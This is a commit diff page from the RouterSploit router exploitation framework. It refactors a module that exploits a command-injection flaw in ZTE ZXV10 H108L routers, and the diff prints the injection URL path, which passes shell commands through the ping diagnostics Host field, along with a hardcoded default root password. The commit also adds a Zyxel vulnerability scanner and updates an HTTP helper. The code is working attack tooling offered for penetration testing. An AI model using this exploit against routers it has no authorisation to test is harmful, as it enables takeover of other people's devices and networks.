Skip to content

R
routersploit
Commit 20dc0712 by lucyoa
Options

Merge branch 'master' of https://github.com/reverse-shell/routersploit

parents a9b6a9e1 99cd1b64
Showing with 35 additions and 11 deletions
routersploit/modules/exploits/zte/zxv10_rce.py
......@@ -10,6 +10,7 @@ from routersploit import (
print_success,
print_status,
shell,
http_request,
)
......@@ -20,7 +21,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'ZTE ZXV10 RCE',
'description': 'Exploits ZTE ZXV10 H108L remote code execution vulnerability that allows executing commands on operating system level.',
'description': 'Exploits ZTE ZXV10 H108L remote code execution vulnerability '
'that allows executing commands on operating system level.',
'authors': [
'Anastasios Stasinopoulos', # vulnerabiltiy discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......@@ -39,8 +41,6 @@ class Exploit(exploits.Exploit):
username = exploits.Option('root', 'Username to log in with')
password = exploits.Option('W!n0&oO7.', 'Password to log in with')
session = None
def __init__(self):
self.session = requests.Session()
......@@ -56,14 +56,15 @@ class Exploit(exploits.Exploit):
def execute(self, cmd):
path = "/getpage.gch?pid=1002&nextpage=manager_dev_ping_t.gch&Host=;echo $({})&NumofRepeat=1&DataBlockSize=64&DiagnosticsState=Requested&IF_ACTION=new&IF_IDLE=submit".format(cmd)
path = "/getpage.gch?pid=1002&nextpage=manager_dev_ping_t.gch&Host=;echo $({})&NumofRepeat=1&" \
"DataBlockSize=64&DiagnosticsState=Requested&IF_ACTION=new&IF_IDLE=submit".format(cmd)
url = "{}:{}{}".format(self.target, self.port, path)
try:
response = self.session.get(url)
response = http_request("GET", url, self.session)
time.sleep(3)
url = "{}:{}/getpage.gch?pid=1002&nextpage=manager_dev_ping_t.gch".format(self.target, self.port)
response = self.session.get(url)
response = http_request("GET", url, self.session)
time.sleep(1)
res = re.findall(r'textarea_1">(.*) -c', response.text)
......@@ -87,7 +88,7 @@ class Exploit(exploits.Exploit):
url = "{}:{}/template.gch".format(self.target, self.port)
try:
response = self.session.get(url)
response = http_request("GET", url, self.session)
except:
return
......@@ -115,7 +116,7 @@ class Exploit(exploits.Exploit):
url = "{}:{}/".format(self.target, self.port)
try:
response = self.session.get(url=url)
response = http_request("GET", url, self.session)
if response is None:
return
......@@ -132,7 +133,7 @@ class Exploit(exploits.Exploit):
"Username": self.username,
"Password": self.password}
response = self.session.post(url, data=data)
response = http_request("POST", url, self.session, data=data)
if "Username" not in response.text and "Password" not in response.text:
print_success("Successful authentication")
return True
......
routersploit/modules/scanners/zyxel_scan.py 0 → 100755
from __future__ import absolute_import
from .autopwn import Exploit as BaseScanner
class Exploit(BaseScanner):
"""
Scanner implementation for Zyxel vulnerabilities.
"""
__info__ = {
'name': 'Zyxel Scanner',
'description': 'Scanner module for Zyxel devices',
'authors': [
'Mariusz Kupidura <f4wkes[at]gmail.com>', # routersploit module
],
'references': (
'',
),
'devices': (
'Zyxel',
),
}
vendor = 'zyxel'
routersploit/utils/__init__.py
......@@ -411,14 +411,14 @@ def random_text(length, alph=string.ascii_letters + string.digits):
return ''.join(random.choice(alph) for _ in range(length))
def http_request(method, url, **kwargs):
def http_request(method, url, session=requests, **kwargs):
""" Wrapper for 'requests' silencing exceptions a little bit. """
kwargs.setdefault('timeout', 30.0)
kwargs.setdefault('verify', False)
try:
return getattr(requests, method.lower())(url, **kwargs)
return getattr(session, method.lower())(url, **kwargs)
except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema):
print_error("Invalid URL format: {}".format(url))
return
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment